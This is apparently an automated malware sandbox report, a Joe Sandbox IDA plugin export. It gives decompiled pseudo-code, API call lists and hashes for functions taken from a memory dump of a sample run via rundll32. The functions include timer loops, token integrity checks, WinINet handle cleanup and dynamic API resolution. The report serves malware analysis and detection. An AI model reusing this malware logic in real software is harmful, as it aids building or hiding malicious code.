0x044b8086
0x044b808a
0x044b8090
0x044b8098
0x044b809a
0x044b809d
0x044b80a3
0x044b80a5
0x044b80a5
0x044b8098
0x044b808a
0x00000000
0x044b8084
0x044b803d
0x044b8040
0x044b8047
0x044b8057
0x044b805a
0x044b806a
0x00000000
0x044b8070
0x044b8051
0x044b8055
0x00000000
0x00000000
0x00000000
0x044b8055
0x044b8022
0x044b8026
0x00000000
0x00000000
0x00000000
0x044b8026
0x044b7fff
0x044b8003
0x00000000
0x00000000
0x00000000

APIs

RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 044B7FAE
LoadLibraryA.KERNEL32(?), ref: 044B802B
GetLastError.KERNEL32 ref: 044B8037
RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 044B806A

Strings

$, xrefs: 044B7F83

Memory Dump Source

Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd

Similarity

API ID: ExceptionRaise$ErrorLastLibraryLoad
String ID: $
API String ID: 948315288-3993045852
Opcode ID: 3d9f6fc49f10e44f2a1abce510bbb0d7cac057f4649acbea212f74a85aca9722
Instruction ID: 8b7e9185f884232443badb5f77a9e658ff1a71b7f3ff1cf5a3ff36c481179dbf
Opcode Fuzzy Hash: 3d9f6fc49f10e44f2a1abce510bbb0d7cac057f4649acbea212f74a85aca9722
Instruction Fuzzy Hash: 8C811B75A00605AFDF21DFA8D884AEEB7F9FB48351F15802AE945E7340E774E905CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 044B661D Relevance: 16.7, APIs: 11, Instructions: 151
timememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E044B661D(void* __edx, intOrPtr _a4, intOrPtr _a8) {
				void _v48;
				long _v52;
				struct %anon52 _v60;
				char _v72;
				long _v76;
				void* _v80;
				union _LARGE_INTEGER _v84;
				struct %anon52 _v92;
				void* _v96;
				void* _v100;
				union _LARGE_INTEGER _v104;
				long _v108;
				struct %anon52 _v124;
				long _v128;
				struct %anon52 _t46;
				void* _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t61;
				long _t65;
				struct %anon52 _t66;
				void* _t69;
				void* _t73;
				signed int _t74;
				void* _t76;
				void* _t78;
				void** _t82;
				signed int _t86;
				void* _t89;

				_t76 = __edx;
				_v52 = 0;
				memset( &_v48, 0, 0x2c);
				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v60 = _t46;
				if(_t46 == 0) {
					_v92.HighPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x44ba2e0);
					_v76 = 0;
					_v80 = 0;
					L044B824A();
					_v84.LowPart = _t46;
					_v80 = _t76;
					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
					_t51 =  *0x44ba30c; // 0x2cc
					_v76 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff);
					_v108 = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x44ba2ec = 5;
						} else {
							_t69 = E044B216C(_t76); // executed
							if(_t69 != 0) {
								goto L4;
							}
						}
						_v104.LowPart = 0;
						L6:
						L6:
						if(_v104.LowPart == 1 && ( *0x44ba300 & 0x00000001) == 0) {
							_v104.LowPart = 2;
						}
						_t74 = _v104.LowPart;
						_t58 = _t74 << 4;
						_t78 = _t89 + (_t74 << 4) + 0x38;
						_t75 = _t74 + 1;
						_v92.LowPart = _t74 + 1;
						_t61 = E044B43EB( &_v96, _t75, _t89 + _t58 + 0x38, _t78,  &_v100); // executed
						_v124 = _t61;
						if(_t61 != 0) {
							goto L17;
						}
						_t66 = _v92;
						_v104.LowPart = _t66;
						if(_t66 != 3) {
							goto L6;
						} else {
							_v124.HighPart = E044B70D8(_t75,  &_v72, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t61 - 0x10d2;
						if(_t61 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x44ba2e4);
							goto L21;
						} else {
							__eflags =  *0x44ba2e8; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t61 = E044B561E();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x44ba2e8);
								L21:
								L044B824A();
								_v104.LowPart = _t61;
								_v100 = _t78;
								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0); // executed
								_t65 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
								_v128 = _t65;
								__eflags = _t65;
								if(_t65 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t82 =  &_v72;
					_t73 = 3;
					do {
						_t54 =  *_t82;
						if(_t54 != 0) {
							HeapFree( *0x44ba2d8, 0, _t54);
						}
						_t82 =  &(_t82[4]);
						_t73 = _t73 - 1;
					} while (_t73 != 0);
					CloseHandle(_v80);
				}
				return _v92.HighPart;
				goto L25;
			}

0x044b661d
0x044b6633
0x044b6637
0x044b663c
0x044b6643
0x044b6649
0x044b664f
0x044b67d6
0x044b6655
0x044b6655
0x044b6657
0x044b665c
0x044b665d
0x044b6663
0x044b6667
0x044b666b
0x044b6679
0x044b6687
0x044b668b
0x044b668d
0x044b669a
0x044b66a6
0x044b66a8
0x044b66ae
0x044b66b7
0x044b66c2
0x044b66c2
0x044b66b9
0x044b66b9
0x044b66c0
0x00000000
0x00000000
0x044b66c0
0x044b66cc
0x00000000
0x044b66d0
0x044b66d5
0x044b66e0
0x044b66e0
0x044b66e8
0x044b66ee
0x044b66f6
0x044b66ff
0x044b6706
0x044b670a
0x044b670f
0x044b6715
0x00000000
0x00000000
0x044b6717
0x044b671b
0x044b6722
0x00000000
0x044b6724
0x044b6734
0x044b6734
0x00000000
0x044b6765
0x044b6765
0x044b676a
0x044b6789
0x044b678b
0x044b6790
0x044b6791
0x00000000
0x044b676c
0x044b676c
0x044b6772
0x00000000
0x044b6774
0x044b6774
0x044b6779
0x044b677b
0x044b6780
0x044b6781
0x044b6797
0x044b6797
0x044b679f
0x044b67ad
0x044b67b1
0x044b67bd
0x044b67bf
0x044b67c3
0x044b67c5
0x00000000
0x044b67cb
0x00000000
0x044b67cb
0x044b67c5
0x044b6772
0x00000000
0x044b676a
0x044b6738
0x044b673a
0x044b673e
0x044b673f
0x044b673f
0x044b6743
0x044b674d
0x044b674d
0x044b6753
0x044b6756
0x044b6756
0x044b675d
0x044b675d
0x044b67e4
0x00000000

APIs

memset.NTDLL ref: 044B6637
CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 044B6643
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 044B666B
SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 044B668B
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,044B3EE8,?), ref: 044B66A6
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,044B3EE8,?,00000000), ref: 044B674D
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,044B3EE8,?,00000000,?,?), ref: 044B675D
_allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 044B6797
SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?), ref: 044B67B1
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 044B67BD

Part of subcall function 044B216C: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,04E69400,00000000,?,76DDF710,00000000,76DDF730), ref: 044B21BB
Part of subcall function 044B216C: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,04E69438,?,00000000,30314549,00000014,004F0053,04E693F4), ref: 044B2258
Part of subcall function 044B216C: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,044B66BE), ref: 044B226A

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,044B3EE8,?,00000000,?,?), ref: 044B67D0

Memory Dump Source

Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd

Similarity

API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
String ID:
API String ID: 3521023985-0
Opcode ID: 59a125b2db2e17e6037fb826a95d08f4421e0861a35f41a0a2040cc2e4079e37
Instruction ID: 641045282e4fe5c5f32e716a65be01015c90c232b3a4af2704a50092f7914004
Opcode Fuzzy Hash: 59a125b2db2e17e6037fb826a95d08f4421e0861a35f41a0a2040cc2e4079e37
Instruction Fuzzy Hash: B9516FB1509320BFEB10AF15DC44DAFBBE8EB85324F104A1EF99592250D774A944CFE2

Uniqueness

Uniqueness Score: -1.00%

Function 044B76BB Relevance: 13.6, APIs: 9, Instructions: 72
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 74%

			E044B76BB(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L044B8244();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x44ba348; // 0x9ad5a8
				_t5 = _t13 + 0x44bb87a; // 0x4e68e22
				_t6 = _t13 + 0x44bb594; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L044B7EAA();
				_t17 = CreateFileMappingW(0xffffffff, 0x44ba34c, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}

0x044b76bb
0x044b76c3
0x044b76c7
0x044b76cd
0x044b76d2
0x044b76d7
0x044b76da
0x044b76dd
0x044b76e2
0x044b76e3
0x044b76e6
0x044b76eb
0x044b76f2
0x044b76fc
0x044b76fe
0x044b76ff
0x044b7702
0x044b771e
0x044b7724
0x044b7728
0x044b7776
0x044b772a
0x044b7737
0x044b7747
0x044b774f
0x044b7761
0x044b7765
0x00000000
0x00000000
0x044b7751
0x044b7754
0x044b7759
0x044b775b
0x044b775b
0x044b7739
0x044b773b
0x044b7767
0x044b7768
0x044b7768
0x044b7737
0x044b777d

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,044B3DBA,?,?,4D283A53,?,?), ref: 044B76C7
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 044B76DD
_snwprintf.NTDLL ref: 044B7702
CreateFileMappingW.KERNELBASE(000000FF,044BA34C,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 044B771E
GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,044B3DBA,?,?,4D283A53,?), ref: 044B7730
MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 044B7747
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,044B3DBA,?,?,4D283A53), ref: 044B7768
GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,044B3DBA,?,?,4D283A53,?), ref: 044B7770

Memory Dump Source

Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd

Similarity

API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1814172918-0
Opcode ID: 3ca5adf165c10b88ae03927bd2bb74703dfba31d5dcde3ca4051b30402437a62
Instruction ID: 34fd8290c1f5aeccc0471559182858a8f1274ebd97763f142a56c4f00b2850eb
Opcode Fuzzy Hash: 3ca5adf165c10b88ae03927bd2bb74703dfba31d5dcde3ca4051b30402437a62
Instruction Fuzzy Hash: 7D21A5B2640604BBEB21AB68DC45FDE77B9EB84750F240026FA45E7280DB70F905CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 044B4274 Relevance: 12.1, APIs: 8, Instructions: 75
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E044B4274(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi) {
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t20;
				void* _t21;
				intOrPtr _t24;
				void* _t37;
				void* _t41;
				intOrPtr* _t45;

				_t41 = __edi;
				_t37 = __ebx;
				_t45 = __eax;
				_t16 =  *((intOrPtr*)(__eax + 0x20));
				if( *((intOrPtr*)(__eax + 0x20)) != 0) {
					E044B6E40(_t16, __ecx, 0xea60);
				}
				_t17 =  *(_t45 + 0x18);
				_push(_t37);
				_push(_t41);
				if(_t17 != 0) {
					InternetSetStatusCallback(_t17, 0);
					InternetCloseHandle( *(_t45 + 0x18)); // executed
				}
				_t18 =  *(_t45 + 0x14);
				if(_t18 != 0) {
					InternetSetStatusCallback(_t18, 0);
					InternetCloseHandle( *(_t45 + 0x14));
				}
				_t19 =  *(_t45 + 0x10);
				if(_t19 != 0) {
					InternetSetStatusCallback(_t19, 0);
					InternetCloseHandle( *(_t45 + 0x10));
				}
				_t20 =  *(_t45 + 0x1c);
				if(_t20 != 0) {
					FindCloseChangeNotification(_t20); // executed
				}
				_t21 =  *(_t45 + 0x20);
				if(_t21 != 0) {
					CloseHandle(_t21);
				}
				_t22 =  *((intOrPtr*)(_t45 + 8));
				if( *((intOrPtr*)(_t45 + 8)) != 0) {
					E044B6C2C(_t22);
					 *((intOrPtr*)(_t45 + 8)) = 0;
					 *((intOrPtr*)(_t45 + 0x30)) = 0;
				}
				_t23 =  *((intOrPtr*)(_t45 + 0xc));
				if( *((intOrPtr*)(_t45 + 0xc)) != 0) {
					E044B6C2C(_t23);
				}
				_t24 =  *_t45;
				if(_t24 != 0) {
					_t24 = E044B6C2C(_t24);
				}
				_t46 =  *((intOrPtr*)(_t45 + 4));
				if( *((intOrPtr*)(_t45 + 4)) != 0) {
					return E044B6C2C(_t46);
				}
				return _t24;
			}

0x044b4274
0x044b4274
0x044b4276
0x044b4278
0x044b427f
0x044b4286
0x044b4286
0x044b428b
0x044b428e
0x044b4295
0x044b429e
0x044b42a2
0x044b42a7
0x044b42a7
0x044b42a9
0x044b42ae
0x044b42b2
0x044b42b7
0x044b42b7
0x044b42b9
0x044b42be
0x044b42c2
0x044b42c7
0x044b42c7
0x044b42c9
0x044b42d4
0x044b42d7
0x044b42d7
0x044b42d9
0x044b42de
0x044b42e1
0x044b42e1
0x044b42e3
0x044b42ea
0x044b42ed
0x044b42f2
0x044b42f5
0x044b42f5
0x044b42f8
0x044b42fd
0x044b4300
0x044b4300
0x044b4305
0x044b4309
0x044b430c
0x044b430c
0x044b4311
0x044b4316
0x00000000
0x044b4319
0x044b4320

APIs

InternetSetStatusCallback.WININET(?,00000000), ref: 044B42A2
InternetCloseHandle.WININET(?), ref: 044B42A7
InternetSetStatusCallback.WININET(?,00000000), ref: 044B42B2
InternetCloseHandle.WININET(?), ref: 044B42B7
InternetSetStatusCallback.WININET(?,00000000), ref: 044B42C2
InternetCloseHandle.WININET(?), ref: 044B42C7
FindCloseChangeNotification.KERNEL32(?,00000000,00000102,?,?,044B3801,?,?,76DC81D0,00000000,00000000), ref: 044B42D7
CloseHandle.KERNEL32(?,00000000,00000102,?,?,044B3801,?,?,76DC81D0,00000000,00000000), ref: 044B42E1

Part of subcall function 044B6E40: WaitForMultipleObjects.KERNEL32(00000002,044B7BB5,00000000,044B7BB5,?,?,?,044B7BB5,0000EA60), ref: 044B6E5B

Memory Dump Source

Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd

Similarity

API ID: Internet$Close$Handle$CallbackStatus$ChangeFindMultipleNotificationObjectsWait
String ID:
API String ID: 2172891992-0
Opcode ID: cdb044a9b2be59397c9398cdc0d089dc43311182a9d1c0841564d6ba1019abb4
Instruction ID: 3e4439e54ba23aff799eea0aed3f7abf0d0ee50c370d780a8c705525acd48da2
Opcode Fuzzy Hash: cdb044a9b2be59397c9398cdc0d089dc43311182a9d1c0841564d6ba1019abb4
Instruction Fuzzy Hash: 1F11F97A6006485BD930AFAAEC8489BF7EDEB442543560D1EE485E3612CB25F8449AB0

Uniqueness

Uniqueness Score: -1.00%

Function 044B6C41 Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E044B6C41(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x44ba2fc > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E044B6D63(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E044B6C2C(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}

0x044b6c4e
0x044b6c55
0x044b6c5c
0x044b6c70
0x044b6c7b
0x044b6c93
0x044b6ca0
0x044b6ca3
0x044b6ca8
0x044b6cb3
0x044b6cb7
0x044b6cc6
0x044b6cca
0x044b6ce6
0x044b6ce6
0x044b6cea
0x044b6cea
0x044b6cef
0x044b6cf3
0x044b6cf9
0x044b6cfa
0x044b6d01
0x044b6d07

APIs

OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 044B6C73
GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 044B6C93
GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 044B6CA3
CloseHandle.KERNEL32(00000000), ref: 044B6CF3

Part of subcall function 044B6D63: RtlAllocateHeap.NTDLL(00000000,00000000,044B5D7B), ref: 044B6D6F

GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 044B6CC6
GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 044B6CCE
GetSidSubAuthority.ADVAPI32(00000000,?), ref: 044B6CDE

Memory Dump Source

Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd

Similarity

API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
String ID:
API String ID: 1295030180-0
Opcode ID: 9c1c6b022d8348d5b2ef7a72cb2e50c7e55c73f871e7c3b07cf4f52d821b11bd
Instruction ID: 5299103f82fe4c12aa7850886e65856f4be68d91995a4ad28b816c09008999cc
Opcode Fuzzy Hash: 9c1c6b022d8348d5b2ef7a72cb2e50c7e55c73f871e7c3b07cf4f52d821b11bd
Instruction Fuzzy Hash: 98213D75900209FFEF119F94DD84EEEBB79FB08304F0000A6E951A6251D7759E44DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 044B1D33 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 64%

			E044B1D33(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t19;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				void* _t38;
				intOrPtr* _t39;
				char* _t40;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x44ba348; // 0x9ad5a8
				_t1 = _t9 + 0x44bb624; // 0x253d7325
				_t36 = 0;
				_t28 = E044B624E(__ecx, _t1);
				if(_t28 != 0) {
					_t39 = __imp__;
					_t13 =  *_t39(_t28, _t38);
					_v8 = _t13;
					_t6 =  *_t39(_a4) + 1; // 0x4e695b1
					_t40 = E044B6D63(_v8 + _t6);
					if(_t40 != 0) {
						strcpy(_t40, _t28);
						_pop(_t33);
						__imp__(_t40, _a4);
						_t19 = E044B24B3(_t33, _t34, _t40, _a8); // executed
						_t36 = _t19;
						E044B6C2C(_t40);
						_t42 = E044B5A07(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E044B6C2C(_t36);
							_t36 = _t42;
						}
						_t43 = E044B4162(_t36, _t33);
						if(_t43 != 0) {
							E044B6C2C(_t36);
							_t36 = _t43;
						}
					}
					E044B6C2C(_t28);
				}
				return _t36;
			}

0x044b1d33
0x044b1d36
0x044b1d37
0x044b1d3e
0x044b1d45
0x044b1d4c
0x044b1d50
0x044b1d57
0x044b1d5e
0x044b1d63
0x044b1d6b
0x044b1d75
0x044b1d79
0x044b1d7d
0x044b1d83
0x044b1d88
0x044b1d92
0x044b1d98
0x044b1d9a
0x044b1db1
0x044b1db5
0x044b1db8
0x044b1dbd
0x044b1dbd
0x044b1dc6
0x044b1dca
0x044b1dcd
0x044b1dd2
0x044b1dd2
0x044b1dca
0x044b1dd5
0x044b1dda
0x044b1de0

APIs

Part of subcall function 044B624E: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,044B1D4C,253D7325,00000000,00000000,?,7477C740,044B58D7), ref: 044B62B5
Part of subcall function 044B624E: sprintf.NTDLL ref: 044B62D6

lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,7477C740,044B58D7,00000000,04E695B0), ref: 044B1D5E
lstrlen.KERNEL32(00000000,?,7477C740,044B58D7,00000000,04E695B0), ref: 044B1D66

Part of subcall function 044B6D63: RtlAllocateHeap.NTDLL(00000000,00000000,044B5D7B), ref: 044B6D6F

strcpy.NTDLL ref: 044B1D7D
lstrcat.KERNEL32(00000000,00000000), ref: 044B1D88

Part of subcall function 044B24B3: lstrlen.KERNEL32(00000000,00000000,044B58D7,00000000,?,044B1D97,00000000,044B58D7,?,7477C740,044B58D7,00000000,04E695B0), ref: 044B24C4

Part of subcall function 044B6C2C: RtlFreeHeap.NTDLL(00000000,00000000,044B5E1D,00000000,?,?,00000000), ref: 044B6C38

StrTrimA.SHLWAPI(00000000,=,00000000,00000000,044B58D7,?,7477C740,044B58D7,00000000,04E695B0), ref: 044B1DA5

Part of subcall function 044B5A07: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,044B1DB1,00000000,?,7477C740,044B58D7,00000000,04E695B0), ref: 044B5A11
Part of subcall function 044B5A07: _snprintf.NTDLL ref: 044B5A6F

Strings

=, xrefs: 044B1D9F

Memory Dump Source

Source File: 00000003.00000002.951691155.00000000044B1000.00000020.10000000.00040000.00000000.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000003.00000002.951646149.00000000044B0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951796245.00000000044B9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951843562.00000000044BA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000003.00000002.951894977.00000000044BC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_44b0000_rundll32.jbxd

Similarity

API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
String ID: =
API String ID: 2864389247-1428090586
Opcode ID: 6cc9420b1cf64a8b8284f4a5504b16115e4dde674093bf6e4fbbf0e59d766160
Instruction ID: 927c8cd243dfcf356b58465d8990b975dc47d2078b7ee21349082fa2d0cfb999
Opcode Fuzzy Hash: 6cc9420b1cf64a8b8284f4a5504b16115e4dde674093bf6e4fbbf0e59d766160
Instruction Fuzzy Hash: 2011C633901524776F1277BA9C84CEF7AADDE89658706001BFA80A7202CE78FD0197F2

Uniqueness

Uniqueness Score: -1.00%

Function 00401446 Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00401446(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E004010A8(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x4041c4 + 0x405014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x4041c4 + 0x405151);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E0040152A(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x4041c4 + 0x405161);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x4041c4 + 0x405174);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x4041c4 + 0x405189);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x4041c4 + 0x40519f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E00401000(_t56, _a12); // executed
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x00401454
0x00401458
0x00401519
0x0040145e
0x00401476
0x00401485
0x0040148c
0x0040148e
0x00401493
0x00401511
0x00401512
0x00401495
0x004014a2
0x004014a4
0x004014a9
0x00000000
0x004014ab
0x004014b8
0x004014ba
0x004014bf
0x00000000
0x004014c1
0x004014ce
0x004014d0
0x004014d5
0x00000000
0x004014d7
0x004014e4
0x004014e6
0x004014eb
0x00000000
0x004014ed
0x004014f3
0x004014f9
0x004014fe
0x00401503
0x00401508
0x00000000
0x0040150a
0x0040150d
0x0040150d
0x00401508
0x004014eb
0x004014d5
0x004014bf
0x004014a9
0x00401493
0x00401527

APIs

